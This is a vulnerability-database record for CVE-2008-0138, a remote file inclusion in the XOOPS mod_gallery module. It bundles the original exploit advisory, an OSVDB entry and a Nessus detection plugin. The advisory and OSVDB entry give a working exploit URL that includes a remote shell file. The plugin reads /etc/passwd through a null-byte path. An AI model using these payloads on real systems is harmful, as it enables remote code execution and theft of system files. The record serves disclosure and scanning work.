{"id": "EDB-ID:4847", "hash": "ac88d0b5580aecf0de5970241ca9e6f0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability", "description": "XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability. CVE-2008-0138. Webapps exploit for php platform", "published": "2008-01-06T00:00:00", "modified": "2008-01-06T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4847/", "reporter": "Eugene Minaev", "references": [], "cvelist": ["CVE-2008-0138"], "lastseen": "2016-01-31T21:54:38", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-01-31T21:54:38"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0138"]}, {"type": "osvdb", "idList": ["OSVDB:40214"]}, {"type": "nessus", "idList": ["XOOPSGALLERY_GALLERY_BASEDIR_FILE_INCLUDES.NASL"]}], "modified": "2016-01-31T21:54:38"}, "vulnersScore": 6.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4847/", "sourceData": "----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]\n\n\t\t\t\t\t\tXOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE\n\t\t\t\t\t\t\tEugene Minaev underwater@itdefence.ru\n\t\t\t\t___________________________________________________________________\n\t\t\t____/ __ __ _______________________ _______ _______________ \\ \\ \\\n\t\t\t/ .\\ / /_// // / \\ \\/ __ \\ /__/ /\n\t\t\t/ / /_// /\\ / / / / /___/\n\t\t\t\\/ / / / / /\\ / / /\n\t\t\t/ / \\/ / / / / /__ //\\\n\t\t\t\\ / ____________/ / \\/ __________// /__ // / \n\t\t\t/\\\\ \\_______/ \\________________/____/ 2007 /_//_/ // //\\\n\t\t\t\\ \\\\ // // /\n\t\t\t.\\ \\\\ -[ ITDEFENCE.ru Security advisory ]- // // / . \n\t\t\t. \\_\\\\________[________________________________________]_________//_//_/ . .\n\t\t \n\t\t\n\t\tBug works only with register_globals = OFF . I find their security fix very fun , and you ? : )\n\t\t\n\t\t<?php\n\t\t/* Begin Security Fix */\n\t\t$scrubList = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_POST_FILES');\n\t\tforeach ($scrubList as $outer) \n\t\t{\n\t\t\tforeach ($scrubList as $inner) \n\t\t\t{\n\t\t\t\tif (isset(${$outer}[$inner])) \n\t\t\t\t{\n\t\t\t\t\tunset(${$outer}[$inner]);\n\t\t\t\t}\n\t\t\t}\n\t\t} \n\t\t....some php code...\n\t\t/* End Security Fix */\n\t\textract($_GET);\n\t\textract($_POST);\n\t\textract($_COOKIE); \n\t\t?>\n\t\t\n\t\tHah .. very serious security fix , yeah :) \n\t\t\n\t\t<?php\n\t\tif (substr(PHP_OS, 0, 3) == 'WIN') {\n\t\trequire_once($GALLERY_BASEDIR . \"platform/fs_win32.php\");\n\t\t} else {\n\t\trequire_once($GALLERY_BASEDIR . \"platform/fs_unix.php\");\n\t\t} \n\t\t?>\n\t\t\n\t\tzend_hash_key_calc.exe GALLERY_BASEDIR\n\t\t\n\t\tGALLERY_BASEDIR\n\t\tPHP5 hash: -2093085906\n\t\tPHP4 hash: -995617320\n\t\t\n\t\ttest.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2\n\t\t\n\n----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]\n\n# milw0rm.com [2008-01-06]\n", "osvdbidlist": ["40214"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:24", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in xoopsgallery/init_basic.php in the mod_gallery module for XOOPS, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter.", "modified": "2017-09-29T01:30:00", "id": "CVE-2008-0138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0138", "published": "2008-01-08T19:46:00", "title": "CVE-2008-0138", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:36", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2\n## References:\nISS X-Force ID: 39461\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4847\n[CVE-2008-0138](https://vulners.com/cve/CVE-2008-0138)\nBugtraq ID: 27155\n", "modified": "2008-01-06T00:00:00", "published": "2008-01-06T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:40214", "id": "OSVDB:40214", "title": "mod_gallery Module for XOOPS xoopsgallery/init_basic.php GALLERY_BASEDIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T09:58:15", "bulletinFamily": "scanner", "description": "The remote host is running XoopsGallery, a third-party module for\nXoops. \n\nThe version of XoopsGallery installed on the remote host fails to\nsanitize user-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "XOOPSGALLERY_GALLERY_BASEDIR_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/nessus/29870", "published": "2008-01-08T00:00:00", "title": "XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29870);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2008-0138\");\n script_bugtraq_id(27155);\n script_xref(name:\"EDB-ID\", value:\"4847\");\n\n script_name(english:\"XoopsGallery init_basic.php GALLERY_BASEDIR Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file with XoopsGallery\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is prone to a remote\nfile include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running XoopsGallery, a third-party module for\nXoops. \n\nThe version of XoopsGallery installed on the remote host fails to\nsanitize user-supplied input to the 'GALLERY_BASEDIR' parameter of the\n'modules/xoopsgallery/init_basic.php' script before using it to\ninclude PHP code. Provided PHP's 'register_globals' setting is off,\nan unauthenticated, remote attacker may be able to exploit this issue\nto view arbitrary files on the remote host or to execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/01/08\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xoops:xoopsgallery_module\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # Try to retrieve a local file.\n file = \"/etc/passwd\";\n\n r = http_send_recv3(method:\"GET\", port: port, \n item:string(\n dir, \"/modules/xoopsgallery/init_basic.php?\", \n \"GALLERY_BASEDIR=\", file, \"%00\"\n ));\n if (isnull(r)) exit(0);\n res = r[2];\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error because magic_quotes was enabled or...\n string(\"main(\", file, \"\\\\0platform/fs_\") >< res ||\n # we get an error claiming the file doesn't exist or...\n string(\"main(\", file, \"): failed to open stream: No such file\") >< res ||\n # we get an error about open_basedir restriction.\n string(\"open_basedir restriction in effect. File(\", file) >< res\n )\n {\n if (egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = res - strstr(res, '<br');\n contents = data_protection::redact_etc_passwd(output:contents);\n report = string(\n \"Here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}